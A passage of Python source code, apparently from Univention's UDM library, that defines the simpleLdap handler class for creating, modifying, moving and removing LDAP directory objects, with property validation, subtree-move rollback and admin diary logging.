for all LDAP operations (search, create, modify).\n It should be bound to a user which has the LDAP permissions to do the required operations.\n :type lo: :class:`univention.admin.uldap.access`\n\n :param position:\n The LDAP container where a new object should be created in, or `None` for existing objects.\n :type position: :class:`univention.admin.uldap.position` or `None`\n\n :param dn:\n The DN of an existing LDAP object. If a object should be created the DN must not be passed here!\n :type dn: str or None\n\n :param superordinate:\n The superordinate object of this object. Can be omitted. It is automatically searched by the given DN or position.\n :type superordinate: :class:`univention.admin.handlers.simpleLdap` or `None`.\n\n :param attributes:\n The LDAP attributes of the LDAP object as dict. This should by default be omitted. To save performance when an LDAP search is done this can be used, e.g. by the lookup() method.\n If given make sure the dict contains all attributes which are required by :meth:`_ldap_attributes`.\n :type attributes: None or dict\n\n The following attributes hold information about the state of this object:\n\n :ivar str dn:\n A LDAP distinguished name (DN) of this object (if exists, otherwise None)\n :ivar str module: the UDM handlers name (e.g. users/user)\n :ivar dict oldattr:\n The LDAP attributes of this object as dict. If the object does not exists the dict is empty.\n :ivar dict info:\n A internal dictionary which holds the values for every property.\n :ivar list options:\n A list of UDM options which are enabled on this object. Enabling options causes specific object classes and attributes to be added to the object.\n :ivar list policies:\n A list of DNs containing references to assigned policies.\n :ivar dict properties: a dict which maps all UDM properties to :class:`univention.admin.property` instances.\n :ivar univention.admin.mapping.mapping mapping:\n A :class:`univention.admin.mapping.mapping` instance containing a mapping of UDM property names to LDAP attribute names.\n :ivar dict oldinfo:\n A private copy of :attr:`info` containing the original properties which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n :ivar list old_options:\n A private copy of :attr:`options` containing the original options which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n :ivar list oldpolicies:\n A private copy of :attr:`policies` containing the original policies which were set during object loading. This is only set by :func:`univention.admin.handlers.simpleLdap.save`.\n\n .. caution::\n Do not operate on :attr:`info` directly because this would bypass syntax validations. This object should be used like a dict.\n Properties should be assigned in the following way: obj['name'] = 'value'\n \"\"\"\n\n module = '' # the name of the module\n use_performant_ldap_search_filter = False\n\n def __init__(self, co, lo, position, dn=u'', superordinate=None, attributes=None): # type: (None, univention.admin.uldap.access, univention.admin.uldap.position, Text, simpleLdap, _Attributes) -> None\n self._exists = False\n self.co = None\n if isinstance(lo, univention.admin.uldap.access):\n self.lo = lo # type: univention.admin.uldap.access\n elif isinstance(lo, univention.uldap.access):\n ud.debug(ud.ADMIN, ud.ERROR, 'using univention.uldap.access instance is deprecated. Use univention.admin.uldap.access instead.')\n self.lo = univention.admin.uldap.access(lo=lo)\n else:\n raise TypeError('lo must be instance of univention.admin.uldap.access.')\n\n self.dn = dn.decode('utf-8') if isinstance(dn, bytes) else dn # type: Optional[Text]\n self.old_dn = self.dn # type: Optional[Text]\n self.superordinate = superordinate # type: Optional[univention.admin.handlers.simpleLdap]\n\n self.set_defaults = not self.dn # this object is newly created and so we can use the default values\n\n self.position = position or univention.admin.uldap.position(lo.base) # type: univention.admin.uldap.position\n if not position and self.dn:\n self.position.setDn(self.dn)\n self.info = {} # type: _Properties\n self.oldinfo = {} # type: _Properties\n self.policies = [] # type: List[Text]\n self.oldpolicies = [] # type: List[Text]\n self.policyObjects = {} # type: Dict[Text, simplePolicy]\n self.__no_default = [] # type: List[Text]\n\n self._open = False\n self.options = [] # type: List[Text]\n self.old_options = [] # type: List[Text]\n self.alloc = [] # type: List[Union[Tuple[str, str], Tuple[str, str, bool]]] # name,value,updateLastUsedValue\n\n # s4connector_present is a global caching variable than can be\n # None ==> ldap has not been checked for servers with service \"S4 Connector\"\n # True ==> at least one server with IP address (aRecord) is present\n # False ==> no server is present\n global s4connector_present\n if s4connector_present is None:\n s4connector_present = False\n searchResult = self.lo.searchDn(u'(&(|(objectClass=univentionDomainController)(objectClass=univentionMemberServer))(univentionService=S4 Connector)(|(aRecord=*)(aAAARecord=*)))')\n s4connector_present = bool(searchResult)\n self.s4connector_present = s4connector_present\n\n if not univention.admin.modules.modules:\n ud.debug(ud.ADMIN, ud.WARN, 'univention.admin.modules.update() was not called')\n univention.admin.modules.update()\n\n m = univention.admin.modules.get(self.module)\n if not hasattr(self, 'mapping'):\n self.mapping = getattr(m, 'mapping', None)\n\n self.oldattr = {} # type: _Attributes\n if attributes:\n self.oldattr = attributes\n elif self.dn:\n try:\n attr = self._ldap_attributes()\n self.oldattr = self.lo.get(self.dn, attr=attr, required=True)\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if self.oldattr:\n self._exists = True\n if not univention.admin.modules.virtual(self.module) and not univention.admin.modules.recognize(self.module, self.dn, self.oldattr):\n raise univention.admin.uexceptions.wrongObjectType('%s is not recognized as %s.' % (self.dn, self.module))\n oldinfo = self.mapping.unmapValues(self.oldattr)\n oldinfo = self._post_unmap(oldinfo, self.oldattr)\n oldinfo = self._falsy_boolean_extended_attributes(oldinfo)\n self.info.update(oldinfo)\n\n self.policies = [x.decode('utf-8') for x in self.oldattr.get('univentionPolicyReference', [])]\n self.__set_options()\n self.save()\n\n self._validate_superordinate(False)\n\n @property\n def descriptions(self): # type: () -> Dict[Text, univention.admin.property]\n return univention.admin.modules.get(self.module).property_descriptions\n\n @property\n def entry_uuid(self): # type: () -> Optional[str]\n \"\"\"The entry UUID of the object (if object exists)\"\"\"\n if 'entryUUID' in self.oldattr:\n return self.oldattr['entryUUID'][0].decode('ASCII')\n\n def save(self): # type: () -> None\n \"\"\"\n Saves the current internal object state as old state for later comparison when e.g. modifying this object.\n\n .. seealso:: This method should be called by :func:`univention.admin.handlers.simpleLdap.open` and after further modifications in modify() / create().\n\n .. note:: self.oldattr is not set and must be set manually\n \"\"\"\n self.oldinfo = copy.deepcopy(self.info)\n self.old_dn = self.dn\n self.oldpolicies = copy.deepcopy(self.policies)\n self.options = list(set(self.options))\n self.old_options = []\n if self.exists():\n self.old_options = copy.deepcopy(self.options)\n\n def diff(self): # type: () -> List[Tuple[str, Any, Any]]\n \"\"\"\n Returns the difference between old and current state as a UDM modlist.\n\n :returns: A list of 3-tuples (udm-property-name, old-property-value, new-property-values).\n :rtype: list\n \"\"\"\n changes = [] # type: List[Tuple[str, Any, Any]]\n\n for key, prop in self.descriptions.items():\n null = [] if prop.multivalue else None # type: Union[List, None]\n # remove properties which are disabled by options\n if prop.options and not set(prop.options) & set(self.options):\n if self.oldinfo.get(key, null) not in (null, None):\n ud.debug(ud.ADMIN, ud.INFO, \"simpleLdap.diff: key %s not valid (option not set)\" % key)\n changes.append((key, self.oldinfo[key], null))\n continue\n if (self.oldinfo.get(key) or self.info.get(key)) and self.oldinfo.get(key, null) != self.info.get(key, null):\n changes.append((key, self.oldinfo.get(key, null), self.info.get(key, null)))\n\n return changes\n\n def hasChanged(self, key): # type: (Union[str, List[str], Tuple[str]]) -> bool\n \"\"\"\n Checks if the given attribute(s) was (were) changed.\n\n :param key: The name of a property.\n :type key: str or list[str] or tuple[str]\n :returns: True if the property changed, False otherwise.\n :rtype: bool\n \"\"\"\n # FIXME: key can even be nested\n if not isinstance(key, six.string_types):\n return any(self.hasChanged(i) for i in key)\n if (not self.oldinfo.get(key, '') or self.oldinfo[key] == ['']) and (not self.info.get(key, '') or self.info[key] == ['']):\n return False\n\n return not univention.admin.mapping.mapCmp(self.mapping, key, self.oldinfo.get(key, ''), self.info.get(key, ''))\n\n def ready(self): # type: () -> bool\n \"\"\"\n Makes sure all preconditions are met before creating or modifying this object.\n\n It checks if all properties marked required are set.\n It checks if the superordinate is valid.\n\n :returns: True\n :rtype: bool\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n \"\"\"\n missing = []\n for name, p in self.descriptions.items():\n # skip if this property is not present in the current option set\n if p.options and not set(p.options) & set(self.options):\n continue\n\n if p.required and (not self[name] or (isinstance(self[name], list) and self[name] == [u''])):\n ud.debug(ud.ADMIN, ud.INFO, \"property %s is required but not set.\" % name)\n missing.append(name)\n if missing:\n raise univention.admin.uexceptions.insufficientInformation(_('The following properties are missing:\\n%s') % ('\\n'.join(missing),), missing_properties=missing)\n\n # when creating a object make sure that its position is underneath of its superordinate\n if not self.exists() and self.position and self.superordinate and not self._ensure_dn_in_subtree(self.superordinate.dn, self.position.getDn()):\n raise univention.admin.uexceptions.insufficientInformation(_('The position must be in the subtree of the superordinate.'))\n\n self._validate_superordinate(True)\n\n return True\n\n if six.PY2:\n def has_key(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module and if it is enabled in the set UDM options.\n\n :param str key: The name of a property.\n :returns: True if the property exists and is enabled, False otherwise.\n :rtype: bool\n\n .. deprecated:: 4.4\n Use :func:`univention.admin.handlers.simpleLdap.has_property` instead!\n \"\"\"\n return self.has_property(key)\n\n def has_property(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module and if it is enabled in the set UDM options.\n\n :param str key: The name of a property.\n :returns: True if the property exists and is enabled, False otherwise.\n :rtype: bool\n \"\"\"\n try:\n p = self.descriptions[key]\n except KeyError:\n return False\n if p.options:\n return bool(set(p.options) & set(self.options))\n return True\n\n def __setitem__(self, key, value): # type: (str, Any) -> None\n \"\"\"\n Sets or unsets the property to the given value.\n\n :param str key: The name of a property.\n :param value: The value to set.\n\n :raises KeyError: if the property belongs to an option, which is currently not enabled.\n :raises: :class:`univention.admin.uexceptions.noProperty` or :class:`KeyError` if the property does not exists or is not enabled by the UDM options.\n :raises: :class:`univention.admin.uexceptions.valueRequired` if the value is unset but required.\n :raises: :class:`univention.admin.uexceptions.valueMayNotChange` if the values cannot be modified.\n :raises: :class:`univention.admin.uexceptions.valueInvalidSyntax` if the value is invalid.\n \"\"\"\n def _changeable():\n yield self.descriptions[key].editable\n if not self.descriptions[key].may_change:\n yield key not in self.oldinfo or self.oldinfo[key] == value\n # if _prevent_to_change_ad_properties: # FIXME: users.user.object.__init__ modifies firstname and lastname by hand\n # yield not (self.descriptions[key].readonly_when_synced and self._is_synced_object() and self.exists())\n\n # property does not exist\n if not self.has_property(key):\n # don't set value if the option is not enabled\n ud.debug(ud.ADMIN, ud.WARN, '__setitem__: Ignoring property %s' % key)\n try:\n self.descriptions[key]\n except KeyError:\n # raise univention.admin.uexceptions.noProperty(key)\n raise\n return\n # attribute may not be changed\n elif not all(_changeable()):\n raise univention.admin.uexceptions.valueMayNotChange(_('key=%(key)s old=%(old)s new=%(new)s') % {'key': key, 'old': self[key], 'new': value}, property=key)\n # required attribute may not be removed\n elif self.descriptions[key].required and not value:\n raise univention.admin.uexceptions.valueRequired(_('The property %s is required') % self.descriptions[key].short_description, property=key)\n # do nothing\n if self.info.get(key, None) == value:\n ud.debug(ud.ADMIN, ud.INFO, 'values are identical: %s:%s' % (key, value))\n return\n\n if self.info.get(key, None) == self.descriptions[key].default(self):\n self.__no_default.append(key)\n\n if self.descriptions[key].multivalue:\n\n # make sure value is list\n if isinstance(value, six.string_types):\n value = [value]\n elif not isinstance(value, list):\n raise univention.admin.uexceptions.valueInvalidSyntax(_('The property %s must be a list') % (self.descriptions[key].short_description,), property=key)\n\n self.info[key] = []\n for v in value:\n if not v:\n continue\n err = \"\"\n p = None\n try:\n s = self.descriptions[key].syntax\n p = s.parse(v)\n\n except univention.admin.uexceptions.valueError as emsg:\n err = emsg\n if not p:\n if not err:\n err = \"\"\n try:\n raise univention.admin.uexceptions.valueInvalidSyntax(\"%s: %s\" % (key, err), property=key)\n except UnicodeEncodeError: # raise fails if err contains umlauts or other non-ASCII-characters\n raise univention.admin.uexceptions.valueInvalidSyntax(self.descriptions[key].short_description, property=key)\n self.info[key].append(p)\n\n elif not value and key in self.info:\n del self.info[key]\n\n elif value:\n err = \"\"\n p = None\n try:\n s = self.descriptions[key].syntax\n p = s.parse(value)\n except univention.admin.uexceptions.valueError as e:\n err = e\n if not p:\n if not err:\n err = \"\"\n try:\n raise univention.admin.uexceptions.valueInvalidSyntax(\"%s: %s\" % (self.descriptions[key].short_description, err), property=key)\n except UnicodeEncodeError: # raise fails if err contains umlauts or other non-ASCII-characters\n raise univention.admin.uexceptions.valueInvalidSyntax(\"%s\" % self.descriptions[key].short_description, property=key)\n self.info[key] = p\n\n def __getitem__(self, key): # type: (str) -> Any\n \"\"\"\n Get the currently set value of the given property.\n\n :param str key: The name of a property.\n :returns: The currently set value. If the value is not set the default value is returned.\n\n .. warning:: this method changes the set value to the default if it is unset. For a side effect free retrieval of the value use :func:`univention.admin.handlers.simpleLdap.get`.\n \"\"\"\n if not key:\n return None\n\n if key in self.info:\n if self.descriptions[key].multivalue and not isinstance(self.info[key], list):\n # why isn't this correct in the first place?\n ud.debug(ud.ADMIN, ud.WARN, 'The mapping for %s in %s is broken!' % (key, self.module))\n self.info[key] = [self.info[key]]\n return self.info[key]\n elif key not in self.__no_default and self.descriptions[key].editable:\n self.info[key] = self.descriptions[key].default(self)\n return self.info[key]\n elif self.descriptions[key].multivalue:\n return []\n else:\n return None\n\n def get(self, key, default=None): # type: (str, Any) -> Any\n \"\"\"\n Return the currently set value of the given property.\n\n :param str key: The name of a property.\n :param default: The default to return if the property is not set.\n :returns: The currently set value. If the value is not set :attr:`default` is returned.\n \"\"\"\n return self.info.get(key, default)\n\n def __contains__(self, key): # type: (str) -> bool\n \"\"\"\n Checks if the property exists in this module.\n\n :param key: The name of a property.\n :returns: True if the property exists, False otherwise.\n :rtype: bool\n\n .. warning:: This does not check if the property is also enabled by the UDM options. Use :func:`univention.admin.handlers.simpleLdap.has_property` instead.\n \"\"\"\n return key in self.descriptions\n\n def keys(self): # type: () -> Iterable[str]\n \"\"\"\n Returns the names of all properties this module has.\n\n :returns: The list of property names.\n :rtype: list[str]\n \"\"\"\n return self.descriptions.keys()\n\n def items(self): # type: () -> Iterable[Tuple[str, Any]]\n \"\"\"\n Return all items which belong to the current options - even if they are empty.\n\n :returns: a list of 2-tuples (udm-property-name, property-value).\n :rtype: list[tuple]\n\n .. warning:: In certain circumstances this sets the default value for every property (e.g. when having a new object).\n \"\"\"\n return [(key, self[key]) for key in self.keys() if self.has_property(key)]\n\n def create(self, serverctrls=None, response=None): # type: (List[ldap.controls.LDAPControl], Dict[Text, Any]) -> Text\n \"\"\"\n Creates the LDAP object if it does not exists by building the list of attributes (addlist) and write it to LDAP.\n If this call raises an exception it is necessary to instantiate a new object before trying to create it again.\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be created.\n :raises: :class:`univention.admin.uexceptions.objectExists` if the object already exists.\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :param serverctrls: a list of :py:class:`ldap.controls.LDAPControl` instances sent to the server along with the LDAP request.\n :type serverctrls: list[ldap.controls.LDAPControl]\n :param dict response: An optional dictionary to receive the server controls of the result.\n :returns: The DN of the created object.\n :rtype: str\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'add'):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be created.') % (self.module,))\n\n if self.exists():\n raise univention.admin.uexceptions.objectExists(self.dn)\n\n if not isinstance(response, dict):\n response = {}\n\n try:\n self._ldap_pre_ready()\n self.ready()\n\n dn = self._create(response=response, serverctrls=serverctrls)\n except Exception:\n self._safe_cancel()\n raise\n\n for c in response.get('ctrls', []):\n if c.controlType == PostReadControl.controlType:\n self.oldattr.update({k: [v if isinstance(v, bytes) else v.encode('ISO8859-1') for v in val] for k, val in c.entry.items()})\n self._write_admin_diary_create()\n return dn\n\n def _get_admin_diary_event(self, event_name):\n name = self.module.replace('/', '_').upper()\n return DiaryEvent.get('UDM_%s_%s' % (name, event_name)) or DiaryEvent.get('UDM_GENERIC_%s' % event_name)\n\n def _get_admin_diary_args_names(self, event):\n return [\n name\n for name in self.descriptions\n if name in event.args\n ]\n\n def _get_admin_diary_args(self, event):\n args = {'module': self.module}\n if event.name.startswith('UDM_GENERIC_'):\n value = self.dn\n for k, v in self.descriptions.items():\n if v.identifies:\n value = self[k]\n break\n args['id'] = value\n else:\n for name in self._get_admin_diary_args_names(event):\n args[name] = str(self[name])\n return args\n\n def _get_admin_diary_username(self):\n username = ldap.dn.explode_rdn(self.lo.binddn)[0]\n if username != 'cn=admin':\n username = username.rsplit('=', 1)[1]\n return username\n\n def _write_admin_diary_event(self, event, additional_args=None):\n try:\n event = self._get_admin_diary_event(event)\n if not event:\n return\n args = self._get_admin_diary_args(event)\n if args:\n if additional_args:\n args.update(additional_args)\n username = self._get_admin_diary_username()\n write_event(event, args, username=username)\n except Exception as exc:\n ud.debug(ud.ADMIN, ud.WARN, \"Failed to write Admin Diary entry: %s\" % exc)\n\n def _write_admin_diary_create(self):\n self._write_admin_diary_event('CREATED')\n\n def modify(self, modify_childs=True, ignore_license=False, serverctrls=None, response=None): # type: (bool, bool, List[ldap.controls.LDAPControl], Dict[Text, Any]) -> Text\n \"\"\"\n Modifies the LDAP object by building the difference between the current state and the old state of this object and write this modlist to LDAP.\n\n :param modify_childs: Specifies if child objects should be modified as well.\n :type modify_childs: bool\n\n :param ignore_license: If the license is exceeded the modification may fail. Setting this to True causes license checks to be disabled\n :type ignore_license: bool\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be modified.\n\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n\n :raises: :class:`univention.admin.uexceptions.insufficientInformation`\n\n :returns: The DN of the modified object.\n :rtype: str\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'edit'):\n # if the licence is exceeded 'edit' is removed from the modules operations. Nevertheless we need a way to make modifications then.\n if not ignore_license:\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be modified.') % (self.module,))\n\n if not self.exists():\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if not isinstance(response, dict):\n response = {}\n\n try:\n self._ldap_pre_ready()\n self.ready()\n\n dn = self._modify(modify_childs, ignore_license=ignore_license, response=response, serverctrls=serverctrls)\n except Exception:\n self._safe_cancel()\n raise\n\n for c in response.get('ctrls', []):\n if c.controlType == PostReadControl.controlType:\n self.oldattr.update({k: [v if isinstance(v, bytes) else v.encode('ISO8859-1') for v in val] for k, val in c.entry.items()})\n return dn\n\n def _write_admin_diary_modify(self):\n self._write_admin_diary_event('MODIFIED')\n\n def _create_temporary_ou(self): # type: () -> Text\n name = u'temporary_move_container_%s' % time.time()\n\n module = univention.admin.modules.get('container/ou')\n position = univention.admin.uldap.position(u'%s' % self.lo.base)\n\n temporary_object = module.object(None, self.lo, position)\n temporary_object.open()\n temporary_object['name'] = name\n temporary_object.create()\n\n return u'ou=%s' % ldap.dn.escape_dn_chars(name)\n\n def _delete_temporary_ou_if_empty(self, temporary_ou): # type: (str) -> None\n \"\"\"\n Try to delete the organizational unit entry if it is empty.\n\n :param str temporary_ou: The distinguished name of the container.\n \"\"\"\n if not temporary_ou:\n return\n\n dn = u'%s,%s' % (temporary_ou, self.lo.base)\n\n module = univention.admin.modules.get('container/ou')\n temporary_object = univention.admin.modules.lookup(module, None, self.lo, scope='base', base=dn, required=True, unique=True)[0]\n temporary_object.open()\n try:\n temporary_object.remove()\n except (univention.admin.uexceptions.ldapError, ldap.NOT_ALLOWED_ON_NONLEAF):\n pass\n\n def move(self, newdn, ignore_license=False, temporary_ou=None): # type: (str, bool, str) -> str\n \"\"\"\n Moves the LDAP object to the target position.\n\n :param str newdn: The DN of the target position.\n :param bool ignore_license: If the license is exceeded the modification may fail. Setting this to True causes license checks to be disabled.\n :param str temporary_ou: The distiguished name of a temporary container which is used to rename the object if only is letter casing changes.\n\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be moved.\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n\n :returns: The new DN of the moved object\n :rtype: str\n \"\"\"\n ud.debug(ud.ADMIN, ud.INFO, 'move: called for %s to %s' % (self.dn, newdn))\n\n if not (univention.admin.modules.supports(self.module, 'move') or univention.admin.modules.supports(self.module, 'subtree_move')):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be moved.') % (self.module,))\n\n if self.lo.compare_dn(self.dn, self.lo.whoami()):\n raise univention.admin.uexceptions.invalidOperation(_('The own object cannot be moved.'))\n\n if not self.exists():\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if _prevent_to_change_ad_properties and self._is_synced_object():\n raise univention.admin.uexceptions.invalidOperation(_('Objects from Active Directory can not be moved.'))\n\n def n(x):\n return dn2str(str2dn(x))\n\n newdn = n(newdn)\n self.dn = n(self.dn)\n\n goaldn = self.lo.parentDn(newdn)\n goalmodule = univention.admin.modules.identifyOne(goaldn, self.lo.get(goaldn))\n goalmodule = univention.admin.modules.get(goalmodule)\n if not goalmodule or not hasattr(goalmodule, 'childs') or not goalmodule.childs == 1:\n raise univention.admin.uexceptions.invalidOperation(_(\"Destination object can't have sub objects.\"))\n\n if self.lo.compare_dn(self.dn.lower(), newdn.lower()):\n if self.dn == newdn:\n raise univention.admin.uexceptions.ldapError(_('Moving not possible: old and new DN are identical.'))\n else:\n # We must use a temporary folder because OpenLDAP does not allow a rename of an container with subobjects\n temporary_ou = self._create_temporary_ou()\n temp_dn = dn2str(str2dn(newdn)[:1] + str2dn(temporary_ou) + str2dn(self.lo.base))\n self.dn = n(self.move(temp_dn, ignore_license, temporary_ou))\n\n if newdn.lower().endswith(self.dn.lower()):\n raise univention.admin.uexceptions.ldapError(_(\"Moving into one's own sub container not allowed.\"))\n\n if univention.admin.modules.supports(self.module, 'subtree_move'):\n # check if is subtree:\n subelements = self.lo.search(base=self.dn, scope='one', attr=[])\n if subelements:\n olddn = self.dn\n ud.debug(ud.ADMIN, ud.INFO, 'move: found subelements, do subtree move: newdn: %s' % newdn)\n # create copy of myself\n module = univention.admin.modules.get(self.module)\n position = univention.admin.uldap.position(self.lo.base)\n position.setDn(self.lo.parentDn(newdn))\n copyobject = module.object(None, self.lo, position)\n copyobject.options = self.options[:]\n copyobject.open()\n for key in self.keys():\n copyobject[key] = self[key]\n copyobject.policies = self.policies\n copyobject.create()\n to_be_moved = []\n moved = []\n pattern = re.compile(u'%s$' % (re.escape(self.dn),), flags=re.I)\n try:\n for subolddn, suboldattrs in subelements:\n # Convert the DNs to lowercase before the replacement. The cases might be mixed up if the Python lib is\n # used by the connector, for example:\n # subolddn: uid=user_test_h80,ou=TEST_H81,$LDAP_BASE\n # self.dn: ou=test_h81,$LDAP_BASE\n # newdn: OU=TEST_H81,ou=test_h82,$LDAP_BASE\n # -> subnewdn: uid=user_test_h80,OU=TEST_H81,ou=test_h82,$LDAP_BASE\n subnew_position = pattern.sub(dn2str(str2dn(self.lo.parentDn(subolddn))), newdn)\n subnewdn = dn2str(str2dn(subolddn)[:1] + str2dn(subnew_position))\n ud.debug(ud.ADMIN, ud.INFO, 'move: subelement %r to %r' % (subolddn, subnewdn))\n\n submodule = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subolddn)\n if not subobject or not (univention.admin.modules.supports(submodule, 'move') or univention.admin.modules.supports(submodule, 'subtree_move')):\n subold_rdn = u'+'.join(explode_rdn(subolddn, 1))\n type_ = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n raise univention.admin.uexceptions.invalidOperation(_('Unable to move object %(name)s (%(type)s) in subtree, trying to revert changes.') % {\n 'name': subold_rdn,\n 'type': type_ and type_.module,\n })\n to_be_moved.append((subobject, subolddn, subnewdn))\n\n for subobject, subolddn, subnewdn in to_be_moved:\n subobject.open()\n subobject.move(subnewdn)\n moved.append((subolddn, subnewdn))\n\n univention.admin.objects.get(univention.admin.modules.get(self.module), None, self.lo, position='', dn=self.dn).remove()\n self._delete_temporary_ou_if_empty(temporary_ou)\n except BaseException:\n ud.debug(ud.ADMIN, ud.ERROR, 'move: subtree move failed, trying to move back.')\n position = univention.admin.uldap.position(self.lo.base)\n position.setDn(self.lo.parentDn(olddn))\n for subolddn, subnewdn in moved:\n submodule = univention.admin.modules.identifyOne(subnewdn, self.lo.get(subnewdn))\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subnewdn)\n subobject.open()\n subobject.move(subolddn)\n copyobject.remove()\n self._delete_temporary_ou_if_empty(temporary_ou)\n raise\n self.dn = newdn\n return newdn\n else:\n # normal move, fails on subtrees\n res = n(self._move(newdn, ignore_license=ignore_license))\n self._delete_temporary_ou_if_empty(temporary_ou)\n return res\n\n else:\n res = n(self._move(newdn, ignore_license=ignore_license))\n self._delete_temporary_ou_if_empty(temporary_ou)\n return res\n\n def move_subelements(self, olddn, newdn, subelements, ignore_license=False): # type: (str, str, List[Tuple[str, Dict]], bool) -> Optional[List[Tuple[str, str]]]\n \"\"\"\n Internal function to move all children of a container.\n\n :param str olddn: The old distinguished name of the parent container.\n :param str newdn: The new distinguished name of the parent container.\n :param subelements: A list of 2-tuples (old-dn, old-attrs) for each child of the parent container.\n :type subelements: tuple[str, dict]\n :param bool ignore_license: If the license is exceeded the modification may fail. Setting this to True causes license checks to be disabled.\n :returns: A list of 2-tuples (old-dn, new-dn)\n :rtype: list[tuple[str, str]]\n \"\"\"\n if subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'move: found subelements, do subtree move')\n moved = []\n try:\n for subolddn, suboldattrs in subelements:\n ud.debug(ud.ADMIN, ud.INFO, 'move: subelement %s' % subolddn)\n subnewdn = re.sub(u'%s$' % (re.escape(olddn),), newdn, subolddn) # FIXME: looks broken\n submodule = univention.admin.modules.identifyOne(subolddn, suboldattrs)\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subolddn)\n if not subobject or not (univention.admin.modules.supports(submodule, 'move') or univention.admin.modules.supports(submodule, 'subtree_move')):\n subold_rdn = u'+'.join(explode_rdn(subolddn, 1))\n raise univention.admin.uexceptions.invalidOperation(_('Unable to move object %(name)s (%(type)s) in subtree, trying to revert changes.') % {'name': subold_rdn, 'type': univention.admin.modules.identifyOne(subolddn, suboldattrs)})\n subobject.open()\n subobject._move(subnewdn)\n moved.append((subolddn, subnewdn))\n return moved\n except Exception:\n ud.debug(ud.ADMIN, ud.ERROR, 'move: subtree move failed, try to move back')\n for subolddn, subnewdn in moved:\n submodule = univention.admin.modules.identifyOne(subnewdn, self.lo.get(subnewdn))\n submodule = univention.admin.modules.get(submodule)\n subobject = univention.admin.objects.get(submodule, None, self.lo, position='', dn=subnewdn)\n subobject.open()\n subobject.move(subolddn)\n raise\n\n return None # FIXME\n\n def remove(self, remove_childs=False): # type: (bool) -> None\n \"\"\"\n Removes this LDAP object.\n\n :param bool remove_childs: Specifies to remove children objects before removing this object.\n\n :raises: :class:`univention.admin.uexceptions.ldapError` (Operation not allowed on non-leaf: subordinate objects must be deleted first) if the object contains childrens and *remove_childs* is False.\n :raises: :class:`univention.admin.uexceptions.invalidOperation` if objects of this type do not support to be removed.\n :raises: :class:`univention.admin.uexceptions.noObject` if the object does not exists.\n \"\"\"\n if not univention.admin.modules.supports(self.module, 'remove'):\n raise univention.admin.uexceptions.invalidOperation(_('Objects of the \"%s\" object type can not be removed.') % (self.module,))\n\n if not self.dn or not self.lo.get(self.dn):\n raise univention.admin.uexceptions.noObject(self.dn)\n\n if self.lo.compare_dn(self.dn, self.lo.whoami()):\n raise univention.admin.uexceptions.invalidOperation(_('The own object cannot be removed.'))\n\n return self._remove(remove_childs)\n\n def get_gid_for_primary_group(self): # type: () -> str\n \"\"\"\n Return the numerical group ID of the primary group.\n\n :returns: The numerical group ID as a string or \"99999\" if no primary group is declared.\n :rtype: str\n :raises univention.admin.uexceptions.primaryGroup: if the object has no primary group.\n \"\"\"\n gidNum = u'99999'\n if self['primaryGroup']:\n try:\n gidNum = self.lo.getAttr(self['primaryGroup'], 'gidNumber', required=True)[0].decode('ASCII')\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.primaryGroup(self['primaryGroup'])\n return gidNum\n\n def get_sid_for_primary_group(self): # type: () -> str\n \"\"\"\n Return the Windows security ID for the primary group.\n\n :returns: The security identifier of the primary group.\n :rtype: str\n :raises univention.admin.uexceptions.primaryGroup: if the object has no primary group.\n \"\"\"\n try:\n sidNum = self.lo.getAttr(self['primaryGroup'], 'sambaSID', required=True)[0].decode('ASCII')\n except ldap.NO_SUCH_OBJECT:\n raise univention.admin.uexceptions.primaryGroupWithoutSamba(self['primaryGroup'])\n return sidNum\n\n def _ldap_pre_ready(self): # type: () -> None\n \"\"\"Hook which is called before :func:`univention.admin.handlers.simpleLdap.ready`.\"\"\"\n\n def _ldap_pre_create(self): # type: () -> None\n \"\"\"Hook which is called before the object creation.\"\"\"\n self.dn = self._ldap_dn()\n self.request_lock('cn-uid-position', self.dn)\n\n def _ldap_dn(self): # type: () -> Text\n \"\"\"\n Builds the LDAP DN of the object before creation by using the identifying properties to build the RDN.\n\n :returns: the distringuised name.\n :rtype: str\n \"\"\"\n identifier = [\n (self.mapping.mapName(name), self.mapping.mapValueDecoded(name, self.info[name]), 2)\n for name, prop in self.descriptions.items()\n if prop.identifies\n ]\n return u'%s,%s' % (dn2str([identifier]), dn2str(str2dn(self.dn)[1:]) if self.exists() else self.position.getDn())\n\n def _ldap_post_create(self): # type: () -> None\n \"\"\"Hook which is called after the object creation.\"\"\"\n self._confirm_locks()\n\n def _ldap_pre_modify(self): # type: () -> None\n \"\"\"Hook which is called before the object modification.\"\"\"\n\n def _ldap_post_modify(self): # type: () -> None\n \"\"\"Hook which is called after the object modification.\"\"\"\n self._confirm_locks()\n\n def _ldap_pre_rename(self, newdn): # type: (str) -> None\n \"\"\"\n Hook which is called before renaming the object.\n\n :param str newdn: The new distiguished name the object will be renamed 